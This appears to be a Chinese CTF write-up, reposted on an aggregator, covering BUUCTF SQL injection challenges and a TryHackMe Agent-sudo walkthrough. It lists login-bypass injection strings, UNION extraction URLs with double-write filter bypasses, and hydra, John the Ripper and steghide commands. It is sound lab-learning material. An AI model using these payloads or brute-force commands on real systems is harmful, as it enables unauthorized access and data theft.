Web 题记

[极客大挑战 2019]LoveSQL

看到这种就肯定先想到万能密码,试试,得到了用户名和密码

 总结了一些万能密码:

' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1

接着就是常规的爆字段,爆表,爆爆爆!!!

/check.php?username=admin' order by 3%23&password=1
注意:此时是在url中输入的,所以不能用#,而用其url编码%23

 到4的时候报错了,那就是3个字段

/check.php?username=1' union select 1,2,3%23&password=1

/check.php?username=1' union select 1,database(),version()%23&password=1

数据库为geek,爆表

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23&password=1

 试一下l0ve1ysq1这个表

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'%23&password=1

爆数据

/check.php?username=1' union select 1,2,group_concat(password) from l0ve1ysq1%23&password=1

 [极客大挑战 2019]BabySQL

和上一个题目的界面一样,先试试万能密码, 发现不行,

 观察返回的发现or不见了,通过测试发现过滤了好多,双写绕过,通过union联合查询

?username=admin&password=admin' uunionnion sselectelect 1,2,3%23

?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23

?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23

?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23

 [HCTF 2018]admin

两个功能,一个登陆一个注册 ,题目名字是admin,估计用户名就是admin,弱口令爆破一下

看到其他师傅还有很多解法,也学习一下:一题三解之2018HCTF&admin-安全客 - 安全资讯平台

【Tryhackme】Agent-sudo

nmap扫描开放的端口

 发现有三个开放的端口,先访问80端口

 访问网站需要修改User-Agent 为C才能触发到指定页面

bp抓包修改User-Agent

 根据这段文字可以看到一个用户名:chris,还有弱密码,那我们就来爆一下

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.24.83 -t 16 ftp

 登录ftp

 下载所有文件

 根据提示这俩张图片都不是真的图片,用binwalk看一下

可以看到里面隐藏了一个zip文件,需要密码

 使用john破解zip文件

zip2john 8702.zip > zip.hash        //获取hash
john zip.hash                    //破解hash

 破解出密码为alien

 用7z 解压缩

7z e 8702.zip

 解码这段字符串

 

用隐写工具steghide 验证jpg里是否有内容,Area51作为密钥

 得到用户名 : james 密码 : hackerrules!

ssh登录目标靶机

 得到userflag

 sudo -l 查看本账号超级权限,发现不可以用bash

CVE-2019-14287:

 因为box时间到了,后面就很简单,大概就参考这个

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/824003.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MVSNet复现及解析

目录 0.库安装1.参考链接2.调试过程 0.库安装 我在因为复现point-nerf才来研究MVSNet的,因此大部分库在复现point-nerf安装时候就已经安装了,剩下的基本上就只执行了下面两步: pip install tensorboardX-2.4.1-py2.py3-none-any.whl pip inst…

Unity引擎Shader 技术点解释

Shader 类 定义: Shader 类是 Unity 中用于封装着色器程序的实例。它允许开发者在同一个文件中定义多个着色器程序,并指导 Unity 如何使用它们。 兼容性: Shader 类需要与 Unity 的渲染管线兼容。Unity 提供了两种主要的渲染管线&#xf…

C++ 之 newmat 矩阵运算库使用笔记

文章目录 Part.I IntroductionChap.I newmat 简介 Part.II 安装与编译Chap.I 直接使用源码Chap.II 基于 CMake 使用源码Chap.III 编译成库 Part.III 关于矩阵的构造与运算Chap.I 矩阵的构造与初始化Chap.II 矩阵的运算Chap.III 矩阵维数和类型的更改Chap.IV 矩阵最值统计 Refer…

【避坑/个人总结】CARLA仿真遇到问题——AttributeError: module “numpy“ has no attribute “bool“

问题描述 执行以下命令时: ./CarlaUE4.sh -prefernvidia // 以及 ros2 launch carla_shenlan_bridge_ego_vis carla_bridge_ego_vehilce.launch.py 出现以下的问题: 其中的报错类型及具体为:AttributeError: module "numpy" has…

Linux虚拟化————KVM

1、安装kvm虚拟化套件 [rootbogon ~]# yum -y install virt* 2、启动服务 [rootbogon ~]# systemctl start libvirtd [rootbogon ~]# systemctl status libvirtd ● libvirtd.service - Virtualization daemonLoaded: loaded (/usr/lib/systemd/system/libvirtd.service; di…

线下商家地图标注服务/店铺地图定位/商铺地图标注服务源码

简介: 前台 单店标注信息提交, 连锁店标注信息提交 ,支付订单查询,用户问题反馈 后台 系统基本设置,反馈信息查看,订单信息管理,地图信息管理,管理员密码设置,集成微信…

结构体二级指针

1. 其实*p和**pm都是差不多的&#xff0c;一个是告诉系统是一级指针和二级指针&#xff0c;判断他们是否是二级指针还是看他们保存的是否是指针变量的地址 2.写的程序哪段跳过就是哪段有问题 #include <stdio.h> #include <string.h> #include <stdlib.h>…

香港科技大学广州|数据科学与分析学域硕博招生宣讲会—华东师范大学专场

时间&#xff1a;2024年4月25日&#xff08;星期四&#xff09;13:30 地点&#xff1a;华东师范大学普陀校区文附楼507 报名链接&#xff1a;https://www.wjx.top/vm/Q0cKTUI.aspx# 跨学科研究领域 *数据驱动的人工智能和机器学习 *统计学习和建模 工业和商业分析 *特定行业…

鲲鹏920RDMA应用示例代码

当前针对鲲鹏920服务器&#xff0c;编写了RDMA通信传输代码&#xff0c;首先采用TCP socket进行管理信息获取&#xff0c;然后调用verbs函数接口进行数据传输。需要安装rdma-core-devel库才可以编译 代码如下&#xff1a; /** rdma_lib.h** Created on: 2021年1月1日* A…

在Linux系统中设定延迟任务

一、在系统中设定延迟任务要求如下&#xff1a; 要求&#xff1a; 在系统中建立easylee用户&#xff0c;设定其密码为easylee 延迟任务由root用户建立 要求在5小时后备份系统中的用户信息文件到/backup中 确保延迟任务是使用非交互模式建立 确保系统中只有root用户和easylee用户…

【NUCLEO-G071RB】004——GPIO-按键EXTI外部中断控制LED闪烁

NUCLEO-G071RB&#xff1a;004——GPIO-按键EXTI外部中断控制LED闪烁 设计目标电路原理图芯片配置程序修改 设计目标 电路原理图 与NUCLEO-G071RB&#xff1a;003——GPIO-按键控制LED灯相同 芯片配置 1、PC13&#xff08;B1&#xff09;&#xff1a;EXTI外部中断模式&…

东岸科技将赴港IPO,冲刺催收第一股

来源 | 镭射财经&#xff08;leishecaijing&#xff09; 「镭射财经」独家获悉&#xff0c;东岸科技即将开启IPO&#xff0c;向港交所递交上市申请。计划上市的为公司科技板块&#xff0c;拟募集资金主要用于不良资产管理数字化创新。 今年3月&#xff0c;东岸科技董事长朱铁…

Linux LVM 逻辑卷管理

Logical Volume Manager&#xff0c;逻辑卷管理 能够在保持现有数据不变的情况下动态调整磁盘容量&#xff0c;从而提高磁盘管理的灵活性/boot分区用于存放引导文件&#xff0c;不能基于LVM创建 三大概念&#xff1a; 物理卷PV基于硬盘或分区设备创建而来&#xff0c;生成N多…

基于SpringBoot的“滴答拍摄影项目”的设计与实现(源码+数据库+文档+PPT)

基于SpringBoot的“滴答拍摄影项目”的设计与实现&#xff08;源码数据库文档PPT) 开发语言&#xff1a;Java 数据库&#xff1a;MySQL 技术&#xff1a;SpringBoot 工具&#xff1a;IDEA/Ecilpse、Navicat、Maven 系统展示 滴答拍摄影项目结构图 管理员登录首页界面图 用…

Redis中的Lua脚本(一)

Lua脚本 概述 Redis从2.6版本开始引入对Lua脚本的支持&#xff0c;通过在服务器中嵌入Lua环境,Redis客户端可以使用Lua脚本&#xff0c;直接在服务器端原子地执行多个Redis命令。其中使用EVAL命令可以直接对输入的脚本进行求值: 127.0.0.1:6379> EVAL "return hello…

ERP系统功能说明书

. 引言 1.1 编写目的 本文档旨在详细描述ERP系统的功能和特性&#xff0c;以便开发团队和用户了解系统的功能范围和使用方法。 1.2 读者对象 本文档适用于ERP系统的开发团队、测试团队以及最终用户。 1.3 背景 ERP系统是企业资源规划系统&#xff08;Enterprise Resource…

【Linux】git

大家好&#xff0c;我是苏貝&#xff0c;本篇博客带大家了解Linux的编译器-gcc/g&#xff0c;如果你觉得我写的还不错的话&#xff0c;可以给我一个赞&#x1f44d;吗&#xff0c;感谢❤️ 目录 1.安装git2.在gitee上创建仓库3.首次配置4.下载仓库到本地5.三板斧6.git log7.gi…

待研究技术

Fabric.js H5 Canvas的js库 Fabric.js是一个用于创建交互式的HTML5 Canvas应用程序的JavaScript库。它提供了一个简单而强大的API&#xff0c;用于在Web浏览器中绘制和操作图形对象。Fabric.js可以用于创建各种图形应用程序&#xff0c;例如绘图编辑器、图像编辑器、流程图、地…

JavaSE-13笔记【集合2(+2024新)】

文章目录 3.Map3.1 Map继承结构3.2 Map接口的常用方法3.3 遍历Map3.4 HashMap集合3.4.1 HashMap集合key的特点3.4.2 HashMap集合的key存储自定义类型3.4.3 哈希表3.4.3.1 哈希表的介绍3.4.3.2 哈希表的存储原理 3.4.4 存放在HashMap和HashSet集合key部分的元素必须同时重写hash…

【S32K3 MCAL配置】-5.1-MCU Driver:MCU芯片进入Low Power Mode低功耗模式

"><--返回「Autosar_MCAL高阶配置」专栏主页--> 案例背景:此博文适用于“MCU芯片处在常电”工作(MCU的5V/3.3V供电一直存在)的项目当中。另外S32K3仅有RUN模式和STANDBY模式,MCU进入“Low Power Mode低功耗模式”,其实也是让MCU进入STANDBY模式。 目录(共…